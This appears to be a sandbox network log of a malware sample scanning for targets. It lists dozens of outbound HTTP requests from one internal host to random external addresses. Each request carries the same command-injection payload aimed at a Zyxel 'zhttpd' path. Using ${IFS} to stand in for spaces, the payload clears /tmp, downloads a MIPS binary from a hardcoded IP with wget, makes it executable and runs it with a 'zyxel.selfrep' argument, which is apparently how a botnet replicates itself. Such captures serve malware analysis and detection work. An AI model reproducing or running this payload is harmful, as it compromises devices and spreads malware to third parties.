                                                Jan 12, 2024 18:16:36.771616936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7838192.168.2.233907617.253.210.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771641970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7839192.168.2.2346756219.247.247.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771677971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7840192.168.2.2349688108.7.248.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771735907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7841192.168.2.2346450147.115.100.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771753073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7842192.168.2.2349044202.9.220.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771795034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7843192.168.2.2334224191.196.150.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771847010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7844192.168.2.2334102130.225.87.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771874905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7845192.168.2.235875452.79.117.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771927118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7846192.168.2.234939635.17.181.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772000074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7847192.168.2.234010871.24.240.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772017956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7848192.168.2.2348280153.88.222.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772062063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7849192.168.2.235905658.68.104.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772099972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7850192.168.2.2341746137.21.121.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772160053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7851192.168.2.234728899.175.61.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772187948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7852192.168.2.235876887.39.176.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772224903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7853192.168.2.235090647.65.174.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772290945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7854192.168.2.2333990174.47.107.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772341013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7855192.168.2.2356274191.225.78.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772392035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7856192.168.2.2354854161.188.79.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772432089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7857192.168.2.2357300110.229.23.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772488117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7858192.168.2.233768463.61.59.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772558928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7859192.168.2.2337524126.43.207.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772610903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7860192.168.2.2349862205.113.133.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772644997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7861192.168.2.236008214.90.170.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772699118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7862192.168.2.235398278.55.106.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772761106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7863192.168.2.233546013.58.62.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772794962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7864192.168.2.2357586188.54.140.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772830963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7865192.168.2.235850878.62.192.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772871017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7866192.168.2.2353786113.176.81.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772912979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7867192.168.2.2332940114.175.254.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772944927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7868192.168.2.2339610189.189.244.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.772981882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7869192.168.2.2339156190.80.15.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773051023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7870192.168.2.2358714102.171.196.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773097038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7871192.168.2.2345456155.161.167.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773132086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7872192.168.2.2360408121.5.183.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773202896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7873192.168.2.235382883.142.200.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773250103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7874192.168.2.2360640157.104.155.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773276091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7875192.168.2.234485078.124.9.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773319960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7876192.168.2.233888291.75.151.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773355961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7877192.168.2.234170614.189.96.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773401022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7878192.168.2.2337100155.90.48.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773432970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7879192.168.2.234942883.3.195.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773493052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7880192.168.2.234697665.158.222.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773507118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7881192.168.2.234828043.183.253.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773585081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7882192.168.2.2353944124.93.35.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773614883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7883192.168.2.2336146121.148.246.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773669004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7884192.168.2.2354044103.184.42.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773724079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7885192.168.2.2360572104.248.216.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773758888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7886192.168.2.2357136109.73.200.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773813009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7887192.168.2.2347838147.10.207.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773845911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7888192.168.2.2341916139.16.34.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773866892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7889192.168.2.234267644.113.61.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.773938894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7890192.168.2.233611482.149.89.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774007082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7891192.168.2.2352382141.183.37.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774007082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7892192.168.2.2335548107.179.137.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774069071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7893192.168.2.233529067.206.242.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774113894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7894192.168.2.2335922131.182.144.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774156094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7895192.168.2.2350634196.6.97.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774192095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7896192.168.2.234713274.137.70.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774240017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7897192.168.2.234483617.78.131.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774286985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7898192.168.2.2353506186.244.135.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774343967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7899192.168.2.235208691.79.16.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774394035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7900192.168.2.2349092209.81.170.72443
                                                TimestampBytes transferredDirectionData
